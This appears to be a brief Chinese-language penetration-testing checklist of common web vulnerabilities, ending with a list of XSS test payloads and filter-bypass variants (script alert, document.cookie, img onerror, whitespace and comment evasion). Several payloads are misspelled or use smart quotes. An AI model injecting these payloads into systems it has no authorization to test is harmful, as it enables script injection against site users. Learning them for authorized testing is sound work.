安全测试-渗透性测试

安全测试-渗透性测试
明文传输/存储（明文包括：1.请求中存在明文数据传输。2.内存明文传输用户名和密码。3.响应数据中存在明文用户名和密码等。4.客户端反编译存在明文。明文数据直接被攻击者利用并对系统进行攻击。）
越权访问（用户未授权可以访问其他用户的敏感数据。）
敏感信息泄漏(应用程序返回版本号、程序错误详细信息、中间件、SQL语句、系统文件等敏感信息)
上传/下载漏洞（系统可以上传任意类型文件，如php、bat、jsp、class等文件。这些文件可以直接在操作系统层面运行，应用系统存在被攻击风险。）
路径遍历漏洞（攻击者通过向上检索的方式获取服务器上重要文件。如:passwd或者win.ini文件等。存在重要文件信息泄漏风险。）
xss攻击（恶意攻击者将恶意脚本代码（如HTML代码和Javascript脚本）嵌入请求中，当用户在不知情的情况下访问时，就会执行其中的恶意代码，可能会导致cookie窃取、会话劫持、钓鱼欺骗等各种攻击。）
1、最常见的XSS bug检测语句必然是

<script>alert(/XSS/)</script> 
<script>alert(document.cookie)</script>
<script>window.location.href="http://www.baidu.com";</script>

2、利用IMG图片标记属性跨站

<img src=”javacript:alert(/XSS/)”></img>
<img src=# onerror=alert(123)>

3、突破程序员的过滤限制

利用javascript换行与空格突破过滤

<img src = j ava script:al er t(/XSS/)>///空格使用Tab键产生
<img src = j
ava script :a ler t(/xss/)>

利用注释

<img src = “#”/**/onerror = alert(/XSS/)>